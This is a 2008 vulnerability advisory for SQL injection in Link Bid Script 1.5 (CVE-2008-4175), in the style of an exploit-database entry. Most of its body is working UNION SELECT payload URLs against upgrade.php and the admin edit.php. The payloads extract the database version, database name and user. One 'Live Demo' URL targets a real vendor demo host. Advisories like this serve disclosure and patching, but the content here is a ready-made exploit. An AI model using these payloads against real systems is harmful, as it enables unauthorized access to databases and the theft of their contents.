Topic : | Link Bid Script 1.5 Multiple Remote SQL Injection Vulnerabilities
|
SecurityAlert : 4299
CVE : CVE-2008-4175
CWE : CWE-89
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : SirGod
Published : 25.09.2008
Affected Software : | linkbidscript:linkbidscript:1.5 |
 Advisory Content : ###########################################################################
######################################
[+] Link Bid Script 1.5 Multiple Remote SQL Injection
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz :
E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str
0ke
###########################################################################
######################################
[+] Remote SQL Injection
- Note : For PoC 2 you need administrative rights.
PoC 1 :
http://[target]/[path]/upgrade.php?ucat=[SQL]
Example 1 :
http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all
select
1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21
,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
Live Demo 1 :
http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all
select
1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21
,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
---------------------------------------------------------------------------
--------------------------------------
PoC 2 :
http://[target]/[path]/linkadmin/edit.php?id=[SQL]
Example 2 :
http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all
select
1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2
6,27,28,29,30,31,32,33,34,35--
###########################################################################
######################################
References :
http://securityreason.com/expldownload/1/4697/1 (Exploit)
http://www.securityfocus.com/bid/31191
http://www.milw0rm.com/exploits/6466
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|